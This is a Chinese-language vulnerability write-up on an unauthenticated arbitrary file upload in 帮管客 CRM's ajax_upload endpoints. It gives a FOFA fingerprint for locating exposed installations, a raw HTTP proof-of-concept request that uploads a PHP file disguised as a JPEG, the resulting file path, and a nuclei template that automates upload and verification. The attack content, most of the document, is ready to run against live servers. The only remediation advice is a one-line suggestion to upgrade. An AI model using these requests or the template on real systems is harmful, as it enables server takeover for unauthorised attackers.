帮管客CRM任意文件上传漏洞
1.漏洞介绍
帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞,未经授权的攻击者可利用该漏洞获取服务器权限
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:app=“帮管客-CRM”
5.POC
POST /index.php/upload/ajax_upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o
------WebKitFormBoundaryv1WbOn5o
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php
phpinfo();unlink(__FILE__);
------WebKitFormBoundaryv1WbOn5o--
http://127.0.0.1/data/uploads/202402/202402041400820knEMOadj.php
nuclei检测
id: CRM-uploadfile
info:
name: 帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞 未经授权的攻击者可利用该漏洞获取服务器权限
author: test
severity: high
metadata:
fofa: app="帮管客-CRM"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /index.php/upload/ajax_upload HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o
------WebKitFormBoundaryv1WbOn5o
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php
phpinfo();unlink(__FILE__);
------WebKitFormBoundaryv1WbOn5o--
- |
GET data/uploads/{{path}}/{{path1}}.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
extractors:
- type: regex
name: path
group: 1
regex:
- 'uploads\\/(\w*)\\'
internal: true
- type: regex
name: path1
group: 1
regex:
- '\\/(\w*)\.php"'
internal: true
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"PHP")
6.修复建议
更新到最新版本